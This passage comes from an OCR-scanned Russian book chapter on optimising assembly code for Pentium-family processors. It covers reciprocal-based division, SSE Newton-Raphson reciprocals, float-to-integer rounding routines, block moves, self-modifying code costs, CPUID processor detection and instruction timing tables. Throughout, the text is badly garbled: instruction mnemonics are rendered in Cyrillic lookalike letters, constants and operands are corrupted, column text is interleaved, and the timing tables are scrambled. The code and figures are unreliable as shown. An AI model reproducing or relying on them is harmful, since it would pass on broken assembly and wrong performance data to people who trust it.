МОУ [ВЗНТЕТ}, ЕСХ ; сохраняем Ь 
СМР ВАХ, ЕБХ 
МОУ ЕАХ, 0 
УЕ ЗНОВТ САЗЕ_А ; делитель - степень от 2 
ВТУ ЕВХ } 2^(32+Ь) / 9 
ЗНК ЕВХ, 1 ; делитель / 2 
Хок ЕСХ, ЕСХ 
СМР ЕБХ, ЕВХ ; сравниваем остаток с делителем/2 
ЗЕТВЕ сЬ ; 1 если случай В 
МОУ [СОВВЕСТТОМ),ЕСХ } коррекция возможных ошибок округления 
ХОВ ЕСХ, 1 
АБО ВАХ, ЕСХ ; добавляем 1 если случай С 
МОУ [{ ВЕСТРВОСАЬ _021\1508},ЕАХ ; округленное число, обратное 
; делителю 
РОР ЕВХ 
ВЕТ 
САЗЕ_А: МОУ [СОВВЕСТТОМ], -1 ; запоминаем, что у нас случай А 
РОР ЕВХ 
ВЕТ 
ЗБТ_21У1$08В БМОР 


ОТУТЬЕ ЕТХЕР РКОС МБАК ; делимое в ЕАХ, результат в ЕАХ 


МОУ ЕОХ, [СОВВЕСТТОМ ] 

МОУ ЕСХ, [В5НТЕТ] 

ТЕЗТ ЕБХ, ЕОХ . 

98 ЗНОВТ О$ЗНТЕТ ; делитель - степень от 2 
АОО БАХ, ЕОХ 


; коррекция возможных ошибок округления 


с ЗНОКТ РОУЕВЕЬ ; коррекция при переполнении 
МОГ [ВЕСТРВОСАЬ 21/1508] ; умножаем на число, обратное делителю 
МОУ БАХ, ЕБХ 

ОЗНТЕТ: 5НВ БАХ, С ; сдвигаем на количество бит 
ВЕТ 

ООУЕВЕЬ : МОУ БАХ, [ВЕСТРКОСАЪ 01\1508} ; делимое = ОРРРЕРЕЕЕН 
ЗН БАХ, СЬ ; делаем деление с помощью сдвига 
ВЕТ 
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ль 


Ци, 
ОТУТОЕ _Р1ХЕР БМР 


Этот код даст тот же результат, что и инструкция ОГУ для 0 <=х < 232, 0 <4<23> 

Следует обратить внимание на то, что строка '}С РОУЕКЕГ! и ее цель не нужны, ели 
есть уверенность, что х < ОЕЕЕЕЕЕЕЕН. 

Если степени 2 случаются так редко, что не стоит делать специальную оптимизацик, 
для них, можно убрать переход на ОЗШЕТ и делать вместо него Умножение 
с СОКВЕСТТОМ = 0 для случая А. 

Если делитель меняется так часто, что процедура ЗЕТ_ОГУШЗОК нуждается 
в оптимизации, то можно заменить инструкцию В5К. кодом, который приведен в п. 6.26.15 
для процессоров Р1 и РММХ. 







6.27.2.3. Деление чисел с плавающей запятой (все процессоры). Деление чисел с пла. 
вающей запятой занимает 38 или 39 тактов при самой высокой точности. Можно сэко- 
номить некоторое время, указав более низкую точность в контрольном слове (на р] 
иРММХ только ЕГМУ и ЕШГУ выполняются несколько быстрее при низкой точности; на 
РРго, Р2 и РЗ это также относится к ЕЗОВТ). Выполнение других инструкций ускорить 
выполнение кода этим способом невозможно. 


6.27.2.4. Параллельное деление (Р1 и РММХ). На РЁ и РММХ можно производить 
деление числа с плавающей запятой и целочисленное деление параллельно. На РРго, Р2 и 
РЗ это не возможно, потому что целочисленное деление и деление чисел с плавающей 
запятой используют один и тот же механизм. 

Пример: А = А! / А2; В = ВЕ /В2 
















РТР [81] 

РГО [821 

МОУ БАХ, [А1} 
МОУ ЕВХ, [42] 
Со 

РОТУ 

рту ЕВХ 
РЕЗТР [В] 

МОУ [А], БАХ 








Следует убедиться, что в контрольном слове ЕРИ установлен желаемый метод округления. 


6.27.2.5. Использование обратных инструкций для быстрого деления (РЗ). На РЗ во 
можно использование быстрых обратных инструкций ВСР$$ или РСРР$ с делителем, 
азатем умножение результата на делимое. Правда, точность будет всего лишь 12 бит. 
Однако ее можно повысить до 23-бит, используя метод Ньютона-Рафсона, описан 


в сопроводительной заметке АР-803 от Пе: 
х0 = ВСР5$5 (4) 
х1 хо * (2 -- а * хо} = 2*х0 - Я * х0 * 0, 





















Глава 6. Оптимизация для процессоров семейства Репбит 


Паннонии вв оон Бо Нл обо пи в пон пиии орион они он ии вооон виивиниини воно ово о оно воно в иво арии виа ави в сви ив нии ианьнов 
„= *"” 
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где х0 — это первое приближение к обратному от делителя 4, а х! — лучшее прибли 
жение. Нужно использовать эту формулу перед умножение на делимое: 


МОУАР$ ХММ1, [0115085] ; загружаем делители 

ВСРР5 ХММО, ХММ ; приближенное обратное число 
МОР ХММ1, ХММО ; формула Ньютона-Рафсона 
МОЬРЗ ХММ1, ХММО 

АООР$ ХММО, ХММО 

ЗОВР$ ХММО, ХММ1 

МОГРЗ ХММО, [Р1УТЬЕМО5} 








; результаты в ХММО 


Это позволяет сделать 4 деления за 18 тактов с точностью 23 бита. Повысить точ- 
ность, повторяя формулу Ньютона-Рафсона можно, но не очень выгодно. 

Если использовать этот метод для целочисленного деления, тогда нужно проверять 
результат на ошибки округления. Следующий код делает четыре деления с усечением на 
упакованных целых числах размером в слово за, примерно, 42 такта. Это дает точные 
результаты для 0 <= делимое < 7ЕЕЕЕН и 0 < делитель [;= 7ЕЕЕЕН: 


МОУО ММ1, [0115085] ; загружаем четыре делителя 
МОУО ММ2, [01У10Е№0$5] ; загружаем четыре делимых 
РОМРСКНИР ММА, ММ1 ` ; распаковываем делители в РМОВР'ы 


РЗВАО ММА, 16 

РОМРСКЬИО ММЗ, ММ1 

РЗВАР ММЗ, 16 . 

СУТРТ2ОР$ ХММ1, ММ4 ; конвертируем делители в плавающие 
; числа, (два верхних из них} 

МОУБНР$ ХММ1, ХММ1 | 

СУТРТ2Р$ ХММ, ММЗ ; конвертируем нижние два операнда 

РОМРСКНИО ММА, ММ2 ; распаковываем делимые в ОМОВО'ы 

РЗВАО ММА, 16 

РОМРСКЬИО ММЗ, ММ2 

РЗВАО ММЗ, 16 

СУТРТ2Р5 ХММ2, ММА ; конвертируем делимые 4 плавающие числа 
; (верхние два операнда) 

МОУТНР5 ХММ2, ХММ2 

СУТРТ2ОР5 ХММ2, ММЗ ; конвертируем два нижних операнда 

ВСРРЗ ХММО, ХММ1 ; приближенное обратное число делителей 

МОБР5 ХММ1, ХММо ; улучшаем точность методом Ньютона-Рафсона 

РСМРЕОМ ММА, ММА ; создаем четыре целочисленных единицы за раз 

РЗВЬМ ММА, 15 

МОЬР5 ХММ1, ХММО 

АБОР5 ХММО, ХММО 


ЗОВР$ ХММО, ХММ1 ; обратные делители с точностью в 23 бита 
МОЬР5 ХММО, ХММ2 ; умножаем на делимые 
СУТТРЗ2РТ ММО, ХММО ; усекаем нижние два результата 


МОУНЬР5 ХММО, ХММО 
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СУТТРУ2РТ ММЗ, ХММО ; усекаем верхние два результата 

РАСКЗ5ОН ММО, ММЗ ; упаковываем четыре результата в ММ» 

МОУ0 ММЗ, ММ ; умножаем результаты на делители... 

РМОЪЬИ ММЗ, ММО ; чтобы выявить ошибки округления 

РАВОЗИ ММО, ММА ; добавляем 1, чтобы скомпенсировать 
; последнее вычитание 

РАБОЗИ ММЗ, ММ ; добавляем делитель. он должен быть 
; больше делимого 

РСМРСТИ ММЗ, ММ2 ; проверяем, не слишком ли мал 

РАБОЗИ ММО, ММЗ ; вычитаем 1, если это не так 

МОУ [ОПбОТТЕМТЗ], ММО ; сохраняем четыре результата 


Этот код проверяет, не слишком ли мал результат и делает соответствующую коррек- 
цию. Не нужно проверять, если результат слишком велик. 


6.27.2.6. Избегание делений (все процессоры). Очевидно, что необходимо минимизи- 
ровать число делений в алгоритмах. Деления с плавающей запятой на константу или повто- 
ряющиеся деления на одно и то же значения следует делать через умножения на обратное 
число. Но есть много других ситуаций, когда можно снизить число делений. Например: # 
(А/В >с) можно переписать как (А > В*С), если В положительно, и как обратное сравне- 
ние, если В отрицательны. 

А/В + С/О можно переписать как (А*Р + С*В) / (В*О) 

Если используется целочисленное деление, стоит остерегаться того, что погрешности 
округления могут стать другими после переписывания формул. 


6.27.3. Освобождение регистров ЕРУ (все процессоры) 


Необходимо освобождать все использованные регистры ЕРИ до выхода из подпро- 
граммы, не считая регистра, используемого для возвращения результата. 6 в 
Самый быстрый способ освободить один регистр — это ЕЗТР $Т. Самый т 
способ освбодить два регистра на Р1 и РММХ - это ЕСОМРР, на процессорах РРго, 
и РЗ можно использовать как ЕСОМРР, так и ЕЗТР 5Т одновременно. 
Не рекомендуется использовать ЕЕКЕЕ. 


6.27.4. Переход от инструкций ЕРО к ММХ и обратно 
(РММХ, Р2 и РЗ) 


ой М0" 

Необходимо вызывать инструкцию ЕММ$ после инструкции ММХ, за котор 

жет последовать код с инструкциями ЕРО. те 
На РММХ переключение между инструкциями ЕРО и ММХ вызывает ие 

ри производительности. Выполнение первой инструкции ЕРУ после ЕММ$ за 
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примерно на 58 тактов больше, а первой инс 
на 38 тактов больше, 


На Р2 и РЗ подобных потерь нет. Задержку после ЕММ$ можно скрыть, поме 
целочисленные инструкции между ЕММ$ и первой инструкции ЕРИ. 


трукции ММХ после инструкции Е 


6.27.5. Преобразование чисел с плавающей запятой в цел! 
(все процессоры) 


Все подобные преобразования должны осуществляться посредством памяти: 


ЕТЗТР ОМОВР РТВ [ТЕМР] 
МОУ ВАХ, [ТЕМР} 


На РРго, Р2 и РЗ этот код может вызвать потерит из-за попытки считать из [ТЕМР 
того, как закончена запись, потому что инструкция ЕТЗТ медленная (гл. 6.17). \АП 
поможет (п. 6.26.6). Рекомендуется поместить другие инструкции между запи 
в [ТЕМР] и чтением из него, что бы избежать этих потерь. Это относите 
рам, которые будут здесь рассмотрены. 


Спецификации языков С и С++ требует, чтобы конверсия чисел с плавающей зап; 


в целые числа осуществлялась с помощью усечения, а не округления. Метод, 
большинством библиотек С, 


я ко всем пру 


использует 
— изменение контрольного слова ЕРИ, чтобы указать инст] 
ции ЕТЗТР на усечение, и возврат контрольного слова в прежнее состояние после ее вы 


нения. Это метод очень медленный на всех процессорах. На РРго, Р2 и РЗ контроль 
слово ЕРИ не может быть переименовано, поэтому все последующие инструкции с 1 
вающей запятой будут ждать, пока инструкция ЕГОСУ не будет выведена из обращени; 

Если нужно осуществить конверсию числа с плавающей запятой в С или С++, слел 
подумать о том, не лучше ли использовать округление вместо усечения. Если станд: 
ная библиотека не поддерживает быструю функцию округления, тогда можно сдел 
свою собственнук* резлизацию. 

Если нужно усечение внутри цикла, можно изменить контрольное слово за его про 
лами, если инструкции с плавающей запятой внутри цикла могут корректно работ 
данным режимом конвериторования. 

Можно использовать различные способы для того, чтобы усечь аргументы без из 
нения контрольного слова. В данных примерах предполагается, что контрольное сл 
Установлено по умолчанию, т. е. округление к ближайшему. 
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6.27.5.1. Округление к ближайшему. 


; ехбегп "С" 1пЕ гочпЯ (ЗоцЬ1ех}; 


_тоцпа  РВОС МЕАВ 

РОВЬТС _гоипа 
РЬО ОНОВО РТВ [Е5Р+4] 
ЕТ5ТР ООВ РТВ [Е5Р+4] 
МОУ БАХ, ОЧОВО РТВ [Е5Р+4] 
ВЕТ 


_точпЯа  БМОР 
Усечение к нулю 
; ехбегп "С" 116 Египсаее (ЧоцЬ1е Хх}; 


_&типсабе РВОС МЕАКВ 

РОВЬТС _Египсасе 
РО ОНОВО РТВ [Е5Р+4] Ех 
ЗОВ ЕЗР, 12 | ; память для локальных переменных 
РТТ ОИОВО РТВ [Е$Р] ; округленное значение 
РОТ ОНОКО РТК [Е5Р+4] ; значение с плавающей запятой 
ЕР1$ОВ НОВО РТВ [Е5Р] ; вычитаем округленное значение 
РОТР БИОВО РТВ [Е5$Р+8] ; разность 
РОР БАХ ; округленное значение 
РОР ЕСХ ; значение с плавающей запятой 
РОР ЕБХ ; разность (с плавающей запятой) 
ТЕСТ ЕСХ, ЕСХ ; тестируем знак х 
95 ЗНОВТ МЕСАТТУЕ 
АО ЕБХ, 7ЕЕЕРЕЕРЕН ; устанавливаем флаг переноса, если 

; разность меньше -0 

УВВ БАХ, 0 | р ; вычитаем 1, если х-гойп@ (х} < -( 
ВЕТ 

МЕСАТТУЕ: 
ХОВ ЕСХ, ЕСХ 
ТЕЗТ ЕБХ, ЕОХ 
ЗЕТС с ; 1, если разность > 0 
АО БАХ, ЕСХ ; добавляем 1, если х-гоцпа (Хх) >( 
ВЕТ 

_&гипсабе ЕМОР 

6.27.5.2. Усечение к минус бесконечности. 

; ехсегп "С" 116 1Е]оог (Чочр]ех}; 

_ЗЕ1оог РВОС МЕАВ 

РОВЬ1С _1Е100Е 
ЕЬО ОНОВО РТВ [ЕЗР+4] Хх 
ЗОВ ЕЗР, 8 ; память для локальных переменных 
Р15Т ОИОВО РТВ [ЕЗР] ; округленное значение 

у ЕТЗОВ ОНОВО РТВ [Е5Р]} ; вычитаем округленное значение 

ЕЗТР РИОВО РТВ [Е5Р+4] ; разность 
РОР БАХ 


; округленное значение 
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РОР ЕБХ ; 
; разность (с плавающей запятой } 
АОЬ ЕОХ, 7ЕРЕЕЕЕЕН ‚ устанавливаем флаг переноса, если 
; разность мень - 
УВВ ЕАХ, 0 ви 


СВ ; вычитаем 1, если х-гоцпа (х} < -0 
4100г ЕМОР 


ато 





Эти процедуры работают для 
или МАМ. 


У РЗ есть инструкции для усечения чисел с плавающей запятой одинарной точности: 
СУТТ$$2$1 апа СУТТР$2РТ. Эти инструкции очень полезны, если одинарная точность 
удовлетворяет, но если конвертируется число с более высокой точностью в число с оди- 
нарной можно столкнуться с тем, что оно округлится вверх к большему. ” 


6.27.5.3, ‚Альтернатива инструкции Н$ЗТР (Р1 и РММХ). Конвертирование числа 
с плавающей запятой в целое обычно осуществляется следующим образом: 
Е15ТР  ОМОВО РТВ [ТЕМР] 
моу ЕАХ, [ТЕМР] 


-231 <х < 231-1. Они не проверяют на переполнение 


Альтернативный метод заключает в: 


‚ПАТА 

АБТСМ 8 

ТЕМР Во ? 

мото р 595000001 ; РРО-представление 2^51 + 2^52 
РАО [МАСТС] 
ЕОТР ОНОВр РТВ [ТЕМР] 
МОУ БАХ, ПОИОВО РТВ [ТЕМР] 


При добавлении ‘волшебного числа' 251+252 с 
целое число в пределах между 
Сохраняется как число с плава 


уществует такой эффект, что любое 
-231 и +231 будет выравнено в ниж: ах 32-х битах, когда 
же, как еси ое ющей запятой двойной точности. Результат будет такой 
ры лучено с помощью инструкции Е! ТР 
мы ‚ к усечения к нулю. Результат будет отличаться от 
№ ом слове задано усечение или в случае переполнения. Здесь м 

грукция У! АПТ для совместимости со старым 80287 сопроцессоро 
ММ метод не быстрее использования ЕЗТР, но он дает боль 
ато › потому что между инструкциями ЕАОШО и ЕЗТР есть 3 т 


на лнить другими операциями. Можно, например, 
Степень 2 в той же 


Ческому числу. 
вое В этом случ 


со всеми методами 
ЫЗТР, если в кон- 
ожет потребоваться 
м (пункт 6.26.6) 

шую гибкость на Р1 
акта, которые можно 
умножить или разделить число 
операции, сделав обратные преобразования по отношению к маги- 


Также можно добавить константу, добавив ее к магическому числу, кото- 
ае будет иметь двойную точность. 
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6.27.6. Использование целочисленных инструкций 
для осуществления операций 
с плавающей запятой (все процессоры) 


Целочисленные операции в большинстве своем выполняются быстрее, чем инструк. 
ции с плавающей запятой, поэтому зачастую выгоднее использовать их для осуществле. 
ния простых операций с плавающей запятой. Наиболее очевидное применение - эт 
пересылка данных: | 


РЬр ОМОВО РТВ [ЕЗТ] / ЕЗТР ОМОВО РТВ [ЕОТ) 


можно заменить на: 
МОУ ЕАХ, [ЕТ] / МОУ ЕВХ, [Е51+4] / МОУ [ЕБТ], БАХ / МОУ _ 

[Е01+41,ЕВХ 

6.7.6.1. Тестирование, не равно ли значение с плавающей запятой нулю. Значение 
с плавающей запятой, равное нулю, обычно представляется, как 32 или 64 нулевых бита. 
но здесь есть один подводный камень: бит знака может быть равен нулю! Минус ноль 
считается правильным числом с плавающей запятой, и процессор может сгенерировать 
ноль с уставноленным битом знака, если, например, отрицательное число было умноже- 
но на ноль. Чтобы узнать, не равно ли число с плавающей запятой нулю, следует тести- 
ровать знаковый бит: 


РЬР РБИОВО РТВ [ЕВХ} / ЕТЗТ / ЕМ5ТЗИ АХ / АМЬ АН,40Н / 9№2 Тздетс 
Вместо этого, можно использовать целочисленные инструкции: 


МОУ ЕАХ, [ЕВХ] / АБО БАХ, ЕАХ / 92 132ехо 
Если число с плавающей запятой имеет двойную точность (О\УОКО), тогда нужно 
протестировать только биты 32-62. Если они равны нулю, тогда нижняя половина будет 
также равна нулю, если это правильноеное число с плавающей запятой. 
6.27.6.2. Тестирование на неотрицательное значение. Число с плавающей запятой 
отрицательно, если установлен бит знака и, по крайней мере, один произвольный бит: 
МО\ БАХ, [МапьегТоТезе] / СМР ЕАХ,80000000Н / ЗА 15Медае1уе 


6.27.6.3. Манипулирование битом знака. Можно изменить знак числа с плавающей 
запятой, просто инвертировав бит знака: 
ХОВ ВУТЕ РТВ [а] + (ТУРЕ а} - 1, ВОН 


Похожим образом можно получить асбсолютное значение числа с плавающей запя" 
той, просто сбросив бит знака в 0. 
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6.27.6.5. Сравнение чисел с плавающей запятой. Числа с плавающей запятой хра 
в особом формате, который позволяет использовать целочисленные и иБструкиии 
сравнения чисел с плавающей запятой, не считая, бита знака. В случае если два сра 
ваемые числа с плавающей запятой являются корректными и положительными, мо 
просто сравнить их как два целых: о 


РЬР [а] / РСОМР [Ъ] / ЕМЗТЗИ АХ / АМ АН, 1 / 9№2 Абпа11ехТпапЕ 


Можно заменить на: 


МОУ ЕАХ, [а} / МОУ ЕВХ, [Ъ] / СМР ЕАХ,ЕВХ / 3В АЗта\1егТналв. 
Этот метод работает только, если у обоих чисел одинаковая точность, и.ни У одЕ 
из них не установлен бит знака. 


В случае отрицательных чисел их можно сконвертировать определенным обра 
и сделать знаковое сравнение: 


МОУ БАХ, [а] 

МОУ ЕВХ, [Ь] 

МОУ ЕСХ, ЕАХ 

МОУ ЕБХ, ЕВХ 

ЗАК ЕСХ, 31 ; скопировать бит знака 
АМ ЕАХ, 7ЕЕЕЕЕЕЕН ; убрать бит знака 

ЗАК ЕБХ, 31 

АМ ЕВХ, 7ЕРЕЕЕЕЕН 

о Вх, ня ; Преобразуем, если установлен бит зн. 
ЗОВ ЕАХ, ЕСХ 

ЗОВ ЕВХ, ЕОХ 

СМР ЕАХ, ЕВХ 

ЧЪ Ата] ] егТНапВ 


; знаковое сравнение 


Этот метод работает для всех правильных чисел с плавающей запятой, включая -0. 


6.27.7. Использование инструкции с плавающей 


запятой, чтобы осуществлять целочисленные 
операции (Р1 и РММХ) 


а 2” ” и оелочисленное умножение (РГ и РММХ). Умножение чисел с плаваю! 
я я быстрее, чем целочисленное умножение. на РГ и РММХ. Но п 
бра лы Писел в числа с плавающей запятой и конвертирование резуль 
ее * сло очень высока, поэтому умножение с плавающей запятой им 

да, когда количество требуемых преобразований мало по сравне! 








| 
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ли 
с числом умножений. (Довольно соблазнительно использование ненормализованны 
чисел с плавающей запятой, чтобы пропустить часть преобразований, но обработка 
таких чисел очень медленна, и поэтому это плохая идея!) 

На РММХ инструкции умножения ММХ быстрее, чем целочисленное Умножение 
и могут конвейеризоваться, поэтому одним из лучших решений наРММХ может быть 
использование этих инструкций, если достаточно 16-ти битной точности. 

Целочисленное умножение выполняется быстрее, чем умножение с плавающей запя. 
той на РРго, Р2 и РЗ. . 

6.27.7.2. Целочисленное деление (Р1 и РММХ). Деление с плавающей запятой не 
быстрее, чем целочисленное деление, но возможно параллельное выполнение целочис- 
ленных операций (включая целочисленное деление, но не целочисленное умножение), 
в то время как работает ЕРИ — занимается выполнением деления. 

6.27.7.3. Конвертирование двоичных чисел в десятичные (все процессоры). Исполь- 
зование инструкции ЕВ5ТР — простой и удобный способ конвертировать двоичные числа 
в десятичные, хотя не самый быстрый. 


6.27.8. Пересылка блоков данных (все процессоры) 


Есть несколько способов пересылки блоков данных. Наиболее общий метод - это ВЕР 
МОУЗЮ, но при определенных условиях другие методы оказываются быстрее. 

На Р1иРММХ быстрее переместить 8 байтов за раз, если место назначения не нахо- 
дится в кэше следующим образом: 


ТОР:  ЕТЬО ОНОВО РТК [Е5Т] 
РТЬО ОМОвр РТВ [Е51+8} 
ЕХСН 


РТР ОКОВО РТВ [ЕШТ] 
Р15ТР ОИОВО РТВ [Е01+8] 


АБО Е51, 16 
АБО ЕРт; 16 
РЕС ЕСХ 
92 ТОР 


Источник и место назначения должны быть выравнены на 8. Дополнительное время 
используемое медленными инструкциями ЕП.О и Е[5ТР компенсируется уменьшенным 
в два раза числом операций записи. Но этот метод имеет преимущество только на Р! 
иРММХ и только тогда, когда место назначения не находится в кэше первого уровня: 
Невозможно использовать ЕГО и ЕЗТР (без 1), потому что ненормализованные числа 
обрабатываются медленно и не гарантируется, что они останутся неизмененными. 

На РММХ, если место назначения не находится в кэше, выгоднее использовать инст 
рукции ММХ для пересылки восьми байтов за раз, нежели если место назначения нахо” 
дится в кэше. 
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тор: №0\0 — ММО, [ЕЗТ] 
№0У0 — [ЕБТ], ММО 
АОр ЕЗТ, 8 
АБР ЕТ, 8 
ЕС ЕСХ 
ли ТОР 


Данный цикл не нужно оптимизировать или разворачивать, если ожидаются промаху 
кэша, потому что здесь узкое место — доступ к памяти, а не выполнение инструкций. 

На процессорах РРго, Р2 и РЗ инструкция КЕР МОУЗО особенно быстра, есле 
соблюдены следующие условия: 


и источник и назначение должны быть выравнены на 8; 


и направление пересылки "вперед" (очищен флаг направления, инструкция СТ.О); 
и счетчик (ЕСХ) должен быть больше или равен 64; 
и разность между ЕОГ и ЕЗ1 должна быть больше или равна 32. 


На Р2 выгоднее использовать регистры ММХ, если вышеприведенные условия ни 
соблюдены или место назначения находится в кэше первого уровня. Цикл можно развер 
нуть в Два раза, а источник и назначение должны быть выравнены на 8. 

На РЗ самый быстрый путь пересылки данных — использовать инструкцию МО\УАР$ 


если вышеприведенные условия не соблюдены или если место назначения не находитс: 
в кэше первого или второго уровня. 


ЗОВ ЕОТ, Е5Т 
ТОР: МОУАР5 ХММО, [Е5Г] 
МОУАР5 [ЕЗТ+ЕОТ}, ХММО 


АО Е5Т, 16 
БЕС ЕСХ 
9Ма ТОР 


В отличии от ЕГО, МОУАР$ может обрабатывать любую поледовательность бито 
без всяких проблем, но источник и назначение должны быть выравнены на 16. 

Если количество байтов, которые необходимо переместить, не кратно 16, можн 
округлить его до числа, которое ближе всего к 16, и поместить несколько дополнителе 
ных байтов в конце буфера назначения, чтобы получить лишние байты. Если это нево- 
можно, тогда необходимо переместить оставшиеся байты с помощью других методов. 

На РЗ также есть опция прямой записи в КАМ-память без вовлечения в эту операциЕ 
юэша, используя инструкцию МОУМТО или МОУМТР5. Это может быть полезным длятс 
го, чтобы место назначения не попало в кэш. МОУМТР$ чуть-чуть быстрее, чем МОУМТС 
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6.27.9. Самомодифицирующийся код (все процессоры) 


Потери при выполнении кода сразу после того, как тот был изменен, занимают при. 
мерно 19 тактов на Р1, 31 на РММХ и 150-300 на РРго, Р2 и РЗ. Процессоры 80486 
и более ранние требуют переход между модифицирующим и модифицируемым кодом, 
чтобы очистить кэш кода. 

Чтобы получить разрешение на модифицирование кода в защищенной операционной 
системе, требуется вызвать специальные системные функции; в 16-битной \/ 140% это 
СрвапоеЗаесвг, в 32-битной \/лпдо\з — Ушиа!РгоесЕ и Ем МпзгасйопСасве (или помес- 
тить код в сегмент данных). 

Самомодифицирующийся код не считается хорошим тоном программирования, 
но можно пойти на его применение, если выигрыш в скорости значителен. 


6.27.10. Определение типа процессора (все процессоры) 


Теперь стал достаточно очевидным тот факт, что оптимальный код для одного поко- 
ления процессоров семейства РепНшт может не являться таковым для другого. Можно 
сделать несколько вариантов наиболее критичных участков кода программы, чтобы они 
выполнялись максимально быстро на каждом из них. Однако сначала потребуется опре- 
делить, на каком процессоре программа выполняется в настоящий момент. Если исполь- 
зуются инструкции, которые не поддерживаются всеми поколениями процессоров, 
например инструкции ММХ и ХММ, то сначала нужно проверить, поддерживает ли дан- 
ный процессор эти инструкции. Процедура, приведенная ниже, проверяет тип процессо- 
ра и поддерживаемые им технологии. 


; задаем инструкцию СРОТО, если она не известна ассемблеру: 
СРО МАСВО 
ОВ ОРН, ОА2Н 
ЕМОМ 
; Прототип С++: 
; ехбеги "С" 1опа 1пЕ РесесеРгосеззог (у01а}; 
; возвращаемое значение: 
; БЕЗ 8-11 = семья (5 для Р1 и РММХ, 6 для РРго, Р2 и РЗ} 
; Б1Е 0 = поддерживаются инструкции ЕРО 
; Ь:6 15 = поддерживаются условные переходы и инструкция РСОМ1 
; БЕ 23 = поддерживаются инструкции ММХ 
; Ь:Е 25 = поддерживаются инструкции ХММ 
_БекесеРгосеззок РВОС МЕАК 
РОВЬ1С _БебесЕРхосез ог 
РОЗН ЕВХ 


РОЗН Е51 


ООО О ани >71 
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РОЗН ЕО! 
РОЗН ЕВР 
; определяем, по 
 РОЗНЕЙ ’ ддерживает ли микропроцессор инструкцию СРОТЬ 
РОР ВАХ 
МОУ ЕВХ, ЕАХ 
ХОК ЕАХ, 1 5Н0 21 ; 
Он в ; проверяем, можно пи изменять бит СРОТВ 
РОРЕО 
РОЗНЕР " 
РОР БАХ. 
ХОВ ЕАХ, ЕВХ 
АМ БАХ, 1 5НЫ 21 
92 ЗНОКТ ПРЕМБ } инст 
рукция СРОТО не п 
и АХ БАХ оддерживается 
СРО ; 
; получаем количество й 
т АХ, ВАХ функций СРОТО 
95 ЭЗНОВТ ПРЕМО ;ф 
; Функция 1 СРО! не п 
а 1 оддерживается 
СРОТО ‚ получаем семью и 
; особенности про 
АМО ЕАХ, 000000Р00Н ; семья опессора 
ры ЕОХ, ОЕРЕРЕОРЕН ; флаги особенностей 
- ЕАХ, ЕОХ ; комбинируем б 
БРЕМО: РОР ЕВР | ы ити 
РОР БОТ 
РОР Е51 
РОР ЕВХ 
ВЕТ 


_РебесеРгосеззог ЕМОР 


Следует обратить внимание, что некоторые операционные системы не позволяют 
использовать инструкции ХММ. Информация о том, как узнать, поддерживает ли опера- 
ционная система инструкции ХММ, можно найти в интеловской инструкции 
АР-900: "14епбуте зиррог Рог Зиеатте $ПМО Ежепз!опз п Ше Ргосеззог ап Орегайп 
Зумет". Больше информации о идентификации процессора можно найти в инструк и 
АР-485: "пие! Ргосеззог 1ЧепЙсаНоп ап4 Ше СРОШ лзбгисНоп", а 

Если ассемблер не поддерживает инструкции ММХ, ХММ, условной пересылки 
ланных, можно использовать специальные макросы 

(например, мим.авлег.ога/аззет/тасгоз.21р). 
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6.28. Список периодов выполнения инструкций Инструкции Спариваемость 
НА | [5 [№ 
для Ти РММХ — ГАНЕЗАНЕ ПО ОЕ И 
моу5х мОу2Х пр 

Пояснения . . ГЕА цу 

Операнлы: г — регистр, т — память, 1 — число, зг — сегментный регистр, т32 — 32. [05 1Еб Еб [65156 п 140 | пр 
битный операнд памяти ит. д. - 

Такты: указанные значения являются минимальными. Промахи кэша, невыравнен- АОО 50В АМВ ОК ХОВ У 
ность и исключения могут значительно увеличить количество требуемых для выполне- АБО 5ИВ АМО ОВ ХОК ЦУ 
ний тактов. АОО 50В АМО ОВ ХО цу 

Спариваемость: и — спаривается в и-конвейере, У — спаривается в У-конвейере, цу _ АОС $ВВ м 
спаривается в любом конвейере, пр — не спаривается. АОС $ВВ м 

АОС 58В т 
6.28.1. Целочисленные инструкции (Р1 и РММХ) СМР цу 
СМР и 
Таблица 6.8. Время выполнения инструкций. Процессоры Р1 и РММХ Ш к =. 

Инструкции Спариваемость ТЕЗТ | 2) 
МОР ООН ПОНИ В ТЕТ ОИ ПЕ Е: 
мо\ у ТАС ЕС [Ш 
оу тр | СЕ и 
мо тр ТЕ тр 
мо и ост "р 
ЕЕ гр моно тр 
ЕЕ тр ом т 
жеНС гр ом т 
Ат | т гр 
РОЗН 7 и том то 
РОЗН ПЕНИ ПЕ ВЕ том пр 
РОР [п |3 [м ВСЕ о 
РОЗН пр СО Са ОНИ ПЕНИ В 
РОР >35) [пр ВО ОИ ОР О ОИ 
РОЗНЕ Г [35 [№ НА $НЕ АЯ ЗАЕ г 
РОРЕ О 146 пр ЗНК $НЕ $АК 5АЁ пр 
РОСНА РОРА [5 [в ВОК КО ВСК ВС и 
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Инструкции 





ОВ ВОГ 13 (МР ОНИ ПЕНИ 

ВОВ ВОГ ВЕР(МЕ СМР5 Г | 919) _ 

КСВ ВС. м | 

ВСЕ [вы | 

НЕО ЗНС 1634) | 

ЗН НВ  имечаныя 

Вт а) у этой инструкции есть префикс ОЕН, который занимает дополнительный такт; 

ВТ _ ПОНИ ПРЕ ЛИИИ на Р1, если до этого не было мультитактовой инструкции (см. раздел 6.12). 

ВТ || Ъ) у версий с ЕЗ и С$ есть префикс ОЕН, смотри примечание а; 

ВТЕ ВТ5 ВТС с) у версий с 5$, ЕЗ и ($ есть префикс ОЕН, смотри примечание а; 

ВТК ВТЗ ВТС т [84а _ | Фу версий с двумя операндами (не числами) есть префикс ОЕН, смотри примечание 

ВТВ ВТ5 ВТС е) смотри главу 6.22; 

ВСЕ ВСВ ) спаривается, только если в качестве приемника регистр, смотри пункт 6.26.14; 

ЕТС 2) добавляет один такт для раскодировки префикса повторения, если ранее не пр 
шествовала мультитактовая инстукция (такая как СГО, например, смотри раздел 6.12) 

ЭМР САЦ В) спаривается, как если бы производилась запись в приемник, смотри пункт 6.26.1 

ЗМР САН. Чат 19, если $Р кратно 4, смотри пункт 6.10.2; 

сопайопаЦитр ы ]) на Р1: 6 в привилигированном или реальном режиме, 11 в непривилигированн 

САЦ МР т/п пр ‘ошибка в виртуальном. На РММХ: 8 и 13 тактов соответственно. 

ВЕТ [25 т 

ЕТ [369 № 

ВЕТЕ 14/79 № 6.28.2. Инструкции ЕРО (Р1 и РММХ) 

ЕТ [59 т 

2(Е)09 пр Пояснения 

ЕООР р Операнды: г - регистр, т - память, зг - сегментный регистр, п132 - 32-х битный о 

в00мо И ПЕНИ пр ранд памяти и так далее. 

